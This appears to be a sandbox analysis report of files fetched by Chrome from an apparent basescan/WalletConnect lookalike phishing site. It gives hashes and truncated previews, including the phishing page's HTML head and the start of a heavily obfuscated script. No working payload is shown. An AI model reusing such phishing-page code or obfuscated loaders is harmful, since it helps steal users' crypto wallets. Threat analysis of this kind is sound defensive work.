                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 283 x 57, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1722
                                                                                                                                                                                                                                              Entropy (8bit):7.780357922818979
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:LCQZPjWWim3V6uZFK9zbiy29AHxsXMQHh6icOyBGg/FreiVtpP53CvWBron98JsQ:LPdjXi7pb29CxW3dFiTN53CvW5o+sQ
                                                                                                                                                                                                                                              MD5:439B1AAC9E7E68DC834414B74235B913
                                                                                                                                                                                                                                              SHA1:A30430FB867460E5927E722CD74840A1851FAF26
                                                                                                                                                                                                                                              SHA-256:50F79B14F71081BF06681BD745CFC8BEDEC218388EECB04AAAEDCD523DF89E37
                                                                                                                                                                                                                                              SHA-512:C2BE2A7462A9D5D0CFC74E1396EF2FAA1C574878C244D99D6B43EFE514ED23FADFDFCFA913136BC33FA7652D765053DF42728E952EEE13ACFA3DC474FBB4B58F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.......9.....1......EPLTE....................................................................tRNS..@. @`.`...p.0P.`.P_.! ....IDATx...v.(.E.1Y...7....ku.m|.A.]..W....*..G......9..\i.n.=.0.....=...6...7.!*.D.v..\..|........>&...P.1+...,..U..`.. .<...9..~..6.r..j.....W... ..U6..P[..M7 h,.9.Z..R.).Q..f/........Z6....o..6{.....n@.."...t.%.0(.*.R.pd6m(d.`.vc.es...l...l.P).0.....e....*slX......h..l.Q.....n.$6v(T5l.P+......M.L&.l6.\v.M....6...Z.".)3...U.g.Gt...`#.........k..V.....H..*.c.}...=..f....bq'.l..D....Z...y6....<n?yF.0y.Mf.Xf3.p../...&....4G...)...p..J.."..vH..*...'.......*L.c.I...xh.gU.l0..ht.U.. .Q....N.&,6I......j'............3.....v+4..f.5/..{..Oz.v.7..%./.2$+,._...4..m+r.^.,.,i.N.......!F.9.....O.t.6..P..q.u.Ri..4|.-\b.v..g..uW..k.v}....*.>o.%6.1.7.Tpb......KyC.....M...}6X.r*6.r'.z!....w..M....H..t..".rl.i}^:. .`.%.... *..k6.eq........kWJ..Rn....D...&..3>!.l...+.....CG.&..N.Z....gB..1.....A...f.....h6x.c..'.d.W.T>.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (998)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):81812
                                                                                                                                                                                                                                              Entropy (8bit):5.630611294359096
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:FlIIcoq6OP7AMkBNNMnFpFu696MBdSqLlRsOdswnbvJKJvSoCTxP:nFrOP7AMkPNMnFpFZ96MdOmJKJvSJ
                                                                                                                                                                                                                                              MD5:1C188EABF1F0749A0CFFB2C108473370
                                                                                                                                                                                                                                              SHA1:1333F32DE6536DE193C47D36F7EF680C0277DC7E
                                                                                                                                                                                                                                              SHA-256:8DDC6CBDB63A791BFC33F40D4B0A250A18E85E0AE93F72389EBDA9242BEF010D
                                                                                                                                                                                                                                              SHA-512:FCD4F584BCB52C7A21D3A5CE49EEFDAFEF9BC2FA22EF5F3DCB51F9BDA7DF51AA737233FFE29067CCD981E52CE8067BF53D94032C907DA00A354D62F2905137EB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://s2.adform.net/banners/scripts/st/trackpoint-async.js?pagename=bcgame_all_pages
                                                                                                                                                                                                                                              Preview:(function(){var A=window.Adform=window.Adform||{};var aa=Object.prototype.toString,ca=Object.prototype.hasOwnProperty;function G(a,c){if(null!=a)if(a.forEach)a.forEach(c);else for(var b=0;b<a.length;b++)c(a[b],b,a)}function da(a,c,b){return b()?a+"="+c:""}function ea(a,c){null!=c&&""!=c&&a.push(c)}function ja(a){return L(a)&&"[object Array]"==aa.call(a)}function ka(a){return L(a)&&"[object Object]"==aa.call(a)}function la(a){return L(a)&&"[object String]"==aa.call(a)}function ma(a){return!isNaN(parseFloat(a))&&isFinite(a)}.function L(a){return"undefined"!=typeof a}function na(a){return a=(-1!=a.indexOf("%")?a:encodeURIComponent(a)).replace(/\+/g,"%2B")};var oa=window.document,pa=window.location,Da={setCookie:qa,readCookie:ra,isOptedOut:sa,readCookieSafely:ta,setCookieSafely:ua,eraseCookie:va,setFPCookie:wa,readFPCookie:xa,getQSParam:ya,processFirstPartyCookie:za,redirectBack:Aa,optOutForNumberOfDays:Ba,optOut:Ca};function qa(a,c,b,e,f){var h="";b&&(h=new Date,h.setTime(h.getTime()+864E
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9113), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9113
                                                                                                                                                                                                                                              Entropy (8bit):5.300576191647459
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:zGN3RX3rXSuy8Zcsy6EEk9e7/2NbfmUw9TwYoNwmjctII4Bze:i+uy8ZcEEt94/2Nbff83HBt4Bze
                                                                                                                                                                                                                                              MD5:5C8F4A46A21DFF724A763101B646B4F3
                                                                                                                                                                                                                                              SHA1:FBE7C978E0C99D1A22BE935D266DA915A2D400B0
                                                                                                                                                                                                                                              SHA-256:A2BE364E2921857C3E1415E1E9E74E5628A02318662A25DA27A23DA90929C84A
                                                                                                                                                                                                                                              SHA-512:AE0EA77EF19A92124DBAED732D5181A06C54CF696E96A8DD65AF90E0B5FBD62919901E3E3B4F405350057A2F6F9633E5E93E76F5D932FDE9CB988CFFAEF745DF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://event.getblue.io/js/blue-tag.min.js
                                                                                                                                                                                                                                              Preview:window.blue={},window.blue.isMobileDetected=function(){return!!(navigator.userAgent.match(/Android/i)||navigator.userAgent.match(/webOS/i)||navigator.userAgent.match(/iPhone/i)||navigator.userAgent.match(/iPad/i)||navigator.userAgent.match(/iPod/i)||navigator.userAgent.match(/BlackBerry/i)||navigator.userAgent.match(/Windows Phone/i))},window.blue.isFirefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1,window.console||(console={log:function(){}}),function(e,t){e=e||"docReady",t=t||window;var n=[],o=!1,r=!1;function u(){if(!o){o=!0;for(var e=0;e<n.length;e++)n[e].fn.call(window,n[e].ctx);n=[]}}function a(){("complete"===document.readyState||"interactive"===document.readyState)&&u()}t[e]=function(e,t){if("function"!=typeof e)throw TypeError("callback for docReady(fn) must be a function");if(o){setTimeout(function(){e(t)},1);return}n.push({fn:e,ctx:t}),"complete"===document.readyState||"interactive"===document.readyState?setTimeout(u,1):r||(document.addEventListener?(document.ad
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):644
                                                                                                                                                                                                                                              Entropy (8bit):7.6235991816002695
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:EnUcya2Uwbx2vKATKXO92RZPtk6uqOTBHY2OfJwYwPXVgHs16N1q2Fz+52PORG/:JcyaFwKh/ERZPtk5q0C2OfJwnFgjDrIs
                                                                                                                                                                                                                                              MD5:6AFD3B145E9EA84CF7738742F2AC1C97
                                                                                                                                                                                                                                              SHA1:E8A7A7DF986F962D2AD8B893E8187F7F9ABEE5C7
                                                                                                                                                                                                                                              SHA-256:82DF8C9D4EA768D9A4E86E555D656D1E7EAC09AF1EA915D40F1F39525DBE8990
                                                                                                                                                                                                                                              SHA-512:5B8D5E5B78344D9D8DBCEA55D6EAE7A0E1EA4FF09D5473E123C238B29D07FFCECDBA0D0618CED2CB81DD3CA63A5643CF1813668861983D05F5D10CEEB330C415
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/coin/USD.rect.png
                                                                                                                                                                                                                                              Preview:RIFF|...WEBPVP8Lo.../d.../.*..&7=q.......7....6.$E.cf..3..&..q.Ul.J..G'"..../.knj.v.m..(....61...drN...c.@..~I{^..~Q.E.7.......%...\...v.w..GZ..^i#ygy'igicy'....mO8B.L..b{.q..a..5...7)Gt.FMYP.P....~|"....!o..}.....b!4...0..#.u.7..@.....=....Q.H..D........Qv.A.m.j.|.Y.q..9f.......`..;p.I...c..?.?..X[I.h...VgP.....JD..u5.$...;..?..l.1.<4..X..........K.\....`>.'.k.~...3....,..gij|rv;..tc.3.iR..u........$Wl....h.n....j~ .o..f.E...DDl.p.E....E..7...`.&../.o.....v.........rq.....6....1.......0..5ut..{w&.?.\v...K.MN.&....@_..k.5...a..4>.g.&..O...1..w.~M...K.7...?.D...I.O...C.y5h...=7..zf/...@.....=7J+.Z...n.r.a..D.I..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2025)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2026
                                                                                                                                                                                                                                              Entropy (8bit):4.865682003774018
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:w2ZKtXWMeN8aO6xSsf438do0DQ4PjYsBqd64kUceuh:FZKtXSbOGI38doycsioUbuh
                                                                                                                                                                                                                                              MD5:9A97D72D966F2E28C984E6559C01DF26
                                                                                                                                                                                                                                              SHA1:755B041EFEAA5DCEE5F7872FD8DF4EAFA7F7B8C7
                                                                                                                                                                                                                                              SHA-256:6C2D2D1AB4D322AA54FBF81F78DE107B5A481C9A6D1B1700ED21E67B358DAB93
                                                                                                                                                                                                                                              SHA-512:49D7C09DD69D9BCB3DD93B4CDA8128E232577C632DF188C16AB01BD84CCADD376402036F74A117DF68C14AE430AB1CC8A3E4CAF8B42BCCFBE5E9791C7FCB0D7F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/solid-js-8ff414d5.js
                                                                                                                                                                                                                                              Preview:const e=globalThis._bc,{Aliases:t,Assets:s,ChildProperties:a,DOMElements:n,DelegatedEvents:o,Dynamic:c,ErrorBoundary:i,For:l,Hydration:d,HydrationScript:u,Index:p,Match:S,NoHydration:g,Portal:y,Properties:m,RequestContext:h,SVGElements:E,SVGNamespace:b,Show:$,Suspense:C,SuspenseList:x,Switch:P,addEventListener:A,assign:f,classList:v,className:w,clearDelegatedEvents:M,createComponent:D,delegateEvents:H,dynamicProperty:R,effect:T,escape:L,generateHydrationScript:N,getAssets:k,getHydrationKey:O,getNextElement:q,getNextMarker:F,getNextMatch:B,getOwner:I,getPropAlias:V,getRequestEvent:_,hydrate:z,innerHTML:K,insert:G,isDev:j,isServer:U,memo:W,mergeProps:X,render:Y,renderToStream:J,renderToString:Q,renderToStringAsync:Z,resolveSSRNode:ee,runHydrationEvents:re,setAttribute:te,setAttributeNS:se,setProperty:ae,spread:ne,ssr:oe,ssrAttribute:ce,ssrClassList:ie,ssrElement:le,ssrHydrationKey:de,ssrSpread:ue,ssrStyle:pe,style:Se,template:ge,untrack:ye,use:me,useAssets:he}=e.h0lnfr,r=globalThis._bc,{
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                                                              Entropy (8bit):4.610829954379382
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:JSW/FDuX/+HwDRI3zuVVMO+DYQfDn:lRY/+HwNI3zMhe7
                                                                                                                                                                                                                                              MD5:B61BC9A832800C8F3423DF3BE5806775
                                                                                                                                                                                                                                              SHA1:5737B4E4C3D66AE1D08B2CCFC3B39912BF3FE76A
                                                                                                                                                                                                                                              SHA-256:7E9B3453C1B1FF6880BA135DDBC7F2DE2D3A374D2E90BC8977B0651E9D3A4D60
                                                                                                                                                                                                                                              SHA-512:81EDD2120A81093525CDC5F150A5E16314CE6F77FF9EB4F81C5220CFAB41AA981BAD824B52CB3548F7F8786659A774B4C40E6DE5317DCF99A22A0826CAEF0109
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{Z as f}from"./assets/manifest-e71017e8.js";export{f as default};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2236), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2236
                                                                                                                                                                                                                                              Entropy (8bit):5.214680196002364
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:c8H3KXcTPkPpPPPgRGPZC8jKrsH/rmZrN55aMPJd1daiJPdUYtooLL2de4RHFaxf:NxQJHz9gTZ19123w
                                                                                                                                                                                                                                              MD5:64CF5AA6011F4BBAD6146BBAADC00573
                                                                                                                                                                                                                                              SHA1:151111EBD64EA1E0876B34833462FCDEC2545F2C
                                                                                                                                                                                                                                              SHA-256:01A486F50F9EFCC1D5F59887E71509B7C7F85E532C5144630E33D4511DB139AF
                                                                                                                                                                                                                                              SHA-512:68F25A382D48FAC565A9893DBCFD002ACBCDA8941DFF8857BFFFD146FA4EE82D5A3680E2AC5AF3D9945CD47EC6B5F77A9A09D313A0235528FE7ADC2EDCC0E6F2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/jss/ace/theme-dawn.js
                                                                                                                                                                                                                                              Preview:define("ace/theme/dawn",["require","exports","module","ace/lib/dom"],function(e,t,n){t.isDark=!1,t.cssClass="ace-dawn",t.cssText=".ace-dawn .ace_gutter {background: #ebebeb;color: #333}.ace-dawn .ace_print-margin {width: 1px;background: #e8e8e8}.ace-dawn {background-color: #F9F9F9;color: #080808}.ace-dawn .ace_cursor {color: #000000}.ace-dawn .ace_marker-layer .ace_selection {background: rgba(39, 95, 255, 0.30)}.ace-dawn.ace_multiselect .ace_selection.ace_start {box-shadow: 0 0 3px 0px #F9F9F9;}.ace-dawn .ace_marker-layer .ace_step {background: rgb(255, 255, 0)}.ace-dawn .ace_marker-layer .ace_bracket {margin: -1px 0 0 -1px;border: 1px solid rgba(75, 75, 126, 0.50)}.ace-dawn .ace_marker-layer .ace_active-line {background: rgba(36, 99, 180, 0.12)}.ace-dawn .ace_gutter-active-line {background-color : #dcdcdc}.ace-dawn .ace_marker-layer .ace_selected-word {border: 1px solid rgba(39, 95, 255, 0.30)}.ace-dawn .ace_invisible {color: rgba(75, 75, 126, 0.50)}.ace-dawn .ace_keyword,.ace-dawn .a
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2322573
                                                                                                                                                                                                                                              Entropy (8bit):4.856021616319524
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:orw5o9lsIvMZ0+11n76y3lwbjlMLNuRwzU3CaZioDHlfndDKrbMlFeCEI7zKaY06:7
                                                                                                                                                                                                                                              MD5:3C165D806925C83D6DD9AC857FA37903
                                                                                                                                                                                                                                              SHA1:8FE5FC9456691E9367098C3405813C530DFD9C43
                                                                                                                                                                                                                                              SHA-256:1A4AA175873998CCCEE1C1FC2B4C0F5B9E3ED38ACD31D02033147176B9A86439
                                                                                                                                                                                                                                              SHA-512:F230C24613C98F729625890A4CD08B6F7B5ACB148140F5265E42694D29768DA646C8D4D02CA25E1F5CB2D31360311AAC08186647B49DA00DFA58C41C1CCCA97E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:(function(_0x13f36f,_0x2e81b1){const _0x58d0b7=_0x13f36f();function _0x5c7281(_0x287d2e,_0x2333ab,_0x227013,_0x256fbf){return _0x16e3(_0x256fbf-0x97,_0x287d2e);}function _0x3eca8e(_0xeb329b,_0xc5c91,_0x50aa87,_0x2258b9){return _0x16e3(_0x50aa87- -0x19a,_0xeb329b);}while(!![]){try{const _0x48be94=-parseInt(_0x5c7281(0xe2d,0x4f1,0xf7d,0x55d))/(0x2c1*0x4+-0x46c+-0x1*0x697)*(parseInt(_0x3eca8e(0xf52,0x6e9,0x5a6,-0x3c6))/(0x1770+0x9f1*-0x1+-0xd7d))+-parseInt(_0x3eca8e(0x6c9,0xf53,0xb52,0x6d2))/(0x10a1+0x798+-0x812*0x3)*(parseInt(_0x5c7281(-0x280,0xcf9,0xed1,0x630))/(-0x5*-0x227+-0x2*0xdc4+0x10c9*0x1))+-parseInt(_0x5c7281(0x1ba4,0x158f,0x1506,0x16ee))/(-0x13*0x187+-0x1c6*-0x2+-0xd*-0x1f6)+parseInt(_0x5c7281(0xde6,0x17f4,0x1be4,0x1566))/(-0xf7d+-0x2a6*0x1+0x1229*0x1)+parseInt(_0x3eca8e(0x11d1,0xf46,0xe19,0x6e7))/(0xb69*-0x2+0x1*0xb8+0x46d*0x5)*(parseInt(_0x3eca8e(0x1500,0x142e,0x140d,0x19a3))/(0x19*0x7b+-0xdad+-0x3e*-0x7))+parseInt(_0x3eca8e(0x99e,0xa7e,0xf7f,0x8be))/(0xf*-0x127+-0x1ac0+-0x1*
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1605)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1606
                                                                                                                                                                                                                                              Entropy (8bit):5.042579605159322
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:lvJRXwb+PPkCaNGyZWOMQsodkoYOpi8QskdkLQsOn17M1:dJRX5TU1RsJyWs1ksB
                                                                                                                                                                                                                                              MD5:5BC5E4CC8A6B52A3C514C9803D527632
                                                                                                                                                                                                                                              SHA1:22D673C902DB85ED5EA23BDBCD9E4C11C3C3CA91
                                                                                                                                                                                                                                              SHA-256:C07CFF6818157AE4C332CEA5C30BBF91BECBD07D168F5B98833F11602FFA442E
                                                                                                                                                                                                                                              SHA-512:78408FC03F131D88F3BE080A9D4B39614DAE81ABEC16D8EC157FBA8470BEE9F4F92783A170264854AFE385FF1B87695517A7605CDFA80D2CAC9329D017485D88
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/index-c1634a5e.js
                                                                                                                                                                                                                                              Preview:import{h as e}from"./http-f4555b94.js";import{B as a}from"./baseService-449c2e3e.js";const i={getRechargeList(){return e.get("/game/support/bonus/vr/list/")},getRechargeTier(){return e.get("/game/support/bonus/vr/tire/")},claimRakeback(){return e.get("/activity/recharge-bonus/claim/")},rakebackBonusHistory(r){return e.post("/activity/recharge-bonus/records/",r)},activateRecharge(){return e.get("/game/support/bonus/vr/pass/")},claimRecharge(r){return e.post("/game/support/bonus/vr/receive/",r)},changeInterval(r){return e.get(`/game/support/bonus/vr/interval/${r}/`)}};class s extends a{constructor(t){super(),this.api=t}rechargeListResource(){return this.createSharedResource(()=>({queryKey:[this.rechargeListResource.name],queryFn:this.api.getRechargeList,initialData:{lastBetUsd:"0",nextBetUsd:"0",receiveUsd:"0",vipLevel:142,startTime:0,endTime:0,intervalTime:6e5,lastReceiveTime:0,nextReceiveTime:0,receiveTimeMS:0,status:0,rewards:[],viphostUserId:0,sendBonus:!1}}))}rechargeTierResource(){
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/styles.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
